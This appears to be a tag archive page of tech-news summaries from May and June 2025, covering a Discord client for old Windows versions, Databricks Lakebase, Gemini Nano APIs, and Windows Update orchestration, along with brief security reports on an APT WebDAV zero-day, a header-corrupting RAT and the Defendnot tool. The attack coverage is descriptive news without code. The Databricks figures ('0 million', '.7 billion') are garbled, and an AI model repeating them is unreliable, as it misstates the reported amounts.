API Archives

Winsage

June 17, 2025

How Discord Was Ported To Windows 95 And NT 3.1

Discord has developed a new client called Discord Messenger, which allows users on legacy systems such as Windows XP, Windows 95, and NT 3.1 to access the platform. This project utilizes the Discord API as a web application, enabling third-party client development without repercussions from Discord. The developers overcame challenges related to TLS encryption compatibility and crafted shims for API calls absent in older systems. They also addressed runtime issues on Windows NT 3.1 by backporting features from the original operating system.

Tech Optimizer

June 16, 2025

Databricks rolls out Lakebase Postgres and Agent Bricks for AI-era apps

Databricks has introduced the Lakebase Postgres database layer to enhance its lakehouse architecture, facilitating AI applications and analytics on operational data. The company also launched Agent Bricks to simplify the development of automated AI agents. During the Data + AI Summit, CEO Ali Ghodsi emphasized the importance of transitioning from outdated systems to modern solutions for AI. Lakebase, powered by Neon technology, is a fully managed, Postgres-compatible database that supports data loading from over 300 sources. Databricks aims to unify operational and analytical systems for real-time decision-making. The summit outlined a three-chapter framework: establishing the lakehouse, integrating AI, and introducing Lakebase. Agent Bricks enables business users to create AI agents without extensive technical knowledge, while Managed Iceberg Tables support external engines and promise performance optimizations. Databricks announced partnerships with Microsoft and Google Cloud for deeper integration and AI model usage. The company is investing 0 million in AI education and plans to release Lakeflow Designer for no-code ETL capabilities. Databricks anticipates reaching .7 billion in annualized revenue by July, with a growth rate of 50 percent and plans to hire 3,000 employees in 2025. Lakebase is currently in Public Preview.

Winsage

June 10, 2025

APT Hackers Exploited WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware

A cyberattack campaign by the advanced persistent threat group Stealth Falcon targeted a prominent Turkish defense company using a zero-day vulnerability identified as CVE-2025-33053. This vulnerability allowed attackers to manipulate the working directory of legitimate Windows tools to execute malware from their WebDAV servers. The attack was initiated through a spear-phishing email containing a malicious .url file that directed the system to a legitimate Internet Explorer utility, which was then exploited to execute malicious files. The attackers employed process hollowing to bypass traditional defenses. Stealth Falcon, also known as FruityArmor, has been conducting cyber espionage since at least 2012, targeting government and defense sectors in Turkey, Qatar, Egypt, and Yemen. The attack involved a multi-stage infection chain leading to the deployment of "Horus Agent," a custom implant designed for advanced reconnaissance and equipped with anti-analysis techniques. Researchers identified additional custom tools used by Stealth Falcon, including a DC Credential Dumper and a custom keylogger. The group utilizes repurposed legitimate domains to blend their infrastructure with legitimate traffic, complicating detection efforts.

AppWizard

June 4, 2025

Google Unveils Gemini Nano for On-Device AI in Android Apps

Google has updated the Gemini Nano APIs through the ML Kit, introducing new GenAI APIs that allow developers to perform on-device inference for generative AI capabilities in Android applications. These APIs enhance user privacy by executing all operations locally, eliminating cloud processing costs. Features include summarization of articles up to 3,000 words, proofreading for grammatical accuracy, rewriting text in various tones, and generating image descriptions. The GenAI APIs are optimized for Android devices using MediaTek Dimensity, Qualcomm Snapdragon, and Google Tensor platforms, including the Pixel 9 series and Samsung Galaxy S25. They operate without internet connectivity, ensuring rapid response times and improved performance for tasks like summarization and proofreading. The local processing also enhances privacy and security, protecting sensitive user information with safety protocols.

Tech Optimizer

June 2, 2025

Streamline code conversion and testing from Microsoft SQL Server and Oracle to PostgreSQL with Amazon Bedrock

Organizations are transitioning from legacy database systems like Microsoft SQL Server and Oracle to open-source alternatives such as PostgreSQL to reduce costs and enhance scalability. This migration process involves several steps, including schema conversion, business logic transformation, data migration, application changes, and performance tuning. Amazon Bedrock aids this process by automating schema and code conversion, data transformation, identifying code compatibility issues, and generating test cases for validation. The migration challenges include adapting database objects to PostgreSQL's syntax, converting stored procedures and functions, executing ETL processes for data accuracy, modifying application code, and optimizing performance. Amazon Bedrock utilizes generative AI to simplify these tasks, significantly reducing manual effort and errors. An example of code conversion from Microsoft SQL Server to PostgreSQL is provided, illustrating how to convert a stored procedure into a PostgreSQL function while generating corresponding test cases. The process involves using the Amazon Bedrock chat interface to submit prompts for conversion and validation. To support the migration, table creation scripts for the Employees and SalaryUpdateLog tables are included, along with test data that covers various employee scenarios. This data allows for comprehensive testing of the converted function, ensuring it correctly applies salary updates based on specified criteria.

Winsage

May 31, 2025

New Malware Compromise Microsoft Windows Without PE Header

A new strain of malware has been operating undetected on Windows systems for several weeks, utilizing advanced evasion techniques that corrupt its Portable Executable (PE) headers to avoid detection. Security researchers discovered this malware embedded in the memory of a compromised system during an investigation, using a 33GB memory dump that revealed its presence in a dllhost.exe process with process ID 8200. The malware, classified as a Remote Access Trojan (RAT) by Fortinet, employs batch scripts and PowerShell commands for its attack and has capabilities for screenshot capture, remote server functionality, and system service manipulation. Its command and control infrastructure uses encrypted communications, complicating detection efforts. The malware's distinctive feature is the deliberate corruption of DOS and PE headers, which hinders reverse engineering and complicates the reconstruction of the executable from memory dumps. Researchers had to manually locate the malware’s entry point and resolve complex import tables for it to function in a controlled environment.

Winsage

May 29, 2025

Microsoft Opens Windows Update to 3rd-Party Apps

Microsoft is enhancing its Windows Update tool to manage updates for both its products and third-party applications, aiming to streamline the update process. A private preview for developers will be initiated, focusing on business applications but eventually accommodating a wider range of apps. The new "Windows Update orchestration platform" will allow developers to integrate their applications into a unified system that intelligently schedules updates based on factors like user activity and battery status. This platform will provide an API for updates through Windows Update, improving user experience by centralizing updates and allowing better control over the update process. The initiative addresses the fragmented experience IT administrators face and aims to create a cohesive update process. Critics note the delay in implementing a unified update framework, while the initiative also seeks to enhance security by consolidating updates and reducing the risks associated with ad-hoc update agents.

Tech Optimizer

May 29, 2025

Windows PCs at risk as new tool disarms built-in security

All modern Windows PCs come with Microsoft Defender, a built-in antivirus solution. A tool called Defendnot can disable Microsoft Defender by tricking Windows into believing another antivirus is active. It uses an undocumented API to register a counterfeit antivirus, which leads to Microsoft Defender being automatically disabled without user notification. Defendnot creates a scheduled task for persistence and allows customization of the antivirus name. It is a successor to a previous project, No-Defender, which was removed due to copyright issues. Currently, Microsoft Defender flags Defendnot as a threat.

Winsage

May 28, 2025

Microsoft’s Windows Update to include third-party apps – now that’s a game changer

Microsoft is introducing a "Windows Update orchestration platform" that allows third-party developers to integrate their applications with Windows Update. This platform, currently in preview, provides an API for developers to register their apps as update providers, enabling seamless scheduling, downloading, and installation of updates. Developers can defer updates based on user activity and system performance, while users will benefit from a unified update history for all supported applications. Developers interested in the private preview can contact Microsoft at unifiedorchestrator@service.microsoft.com.

Winsage

May 28, 2025

Microsoft wants Windows 11 to handle all updates centrally

Microsoft has initiated a limited public preview of Windows Backup for Organizations to simplify the backup and restoration of device settings for enterprise customers, facilitating the transition from Windows 10 to Windows 11. The company is developing a unified orchestration platform to manage all operating system and software updates, addressing issues related to the current fragmented update process. This platform will be built on the Windows Update stack and provide an API for developers to integrate their applications. Benefits include eco-conscious scheduling, a centralized notification system, holistic update history, streamlined troubleshooting, easier management for IT administrators, and support for common app types. The orchestrator is currently in early development and available only as a private preview, with a focus on enterprises, although a consumer-oriented solution may be possible in the future.